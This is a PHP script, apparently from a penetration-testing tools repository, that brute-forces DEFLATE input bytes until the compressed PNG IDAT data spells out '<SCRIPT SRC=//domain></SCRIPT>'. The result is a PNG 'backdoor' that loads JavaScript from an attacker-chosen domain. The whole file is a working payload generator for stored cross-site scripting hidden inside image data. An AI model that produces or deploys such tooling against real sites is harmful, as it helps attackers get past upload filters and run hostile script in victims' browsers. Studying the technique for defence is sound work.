mgeeky-Penetration-Testing-.../web/generate_png_backdoor_idat_chunks.php

37 lines
973 B
PHP
Executable File

<?php
$domain = strtoupper($argv[1]);
$filename = $argv[2];
// DEFLATE stream bytes
$prefix = '7ff399281922111510691928276e6e';
$suffix = '576e69b16375535b6f';
$precode = '<SCRIPT SRC=//';
$postcode = '></SCRIPT>';
print "Input string to embed in PNG IDAT chunks:\n";
print '"' . $precode . $domain . $postcode . "\"\n\n\n";
$cnt = 0;
for( $i = 0x111111111111; $i < 0xffffffffffff; $i++, $cnt++) {
$b = implode('', str_split(str_pad(dechex($i), 12, '0', STR_PAD_LEFT), 2));
try {
$defl = gzdeflate(hex2bin($prefix . $b . $suffix ));
if ( $cnt % 100000 == 0) {
printf("[Probe: %06d] %s\r\n", $cnt, $defl);
}
if (strpos(strtoupper($defl), $precode.$domain.$postcode) !== false ) {
$cont = bin2hex($defl);
printf("DEFLATE stream found!\n%s\n%s\n\n", $prefix.$b.$suffix, $defl);
file_put_contents($filename, $cont);
}
} catch( exception $e) {
}
}
print 'Done.'
?>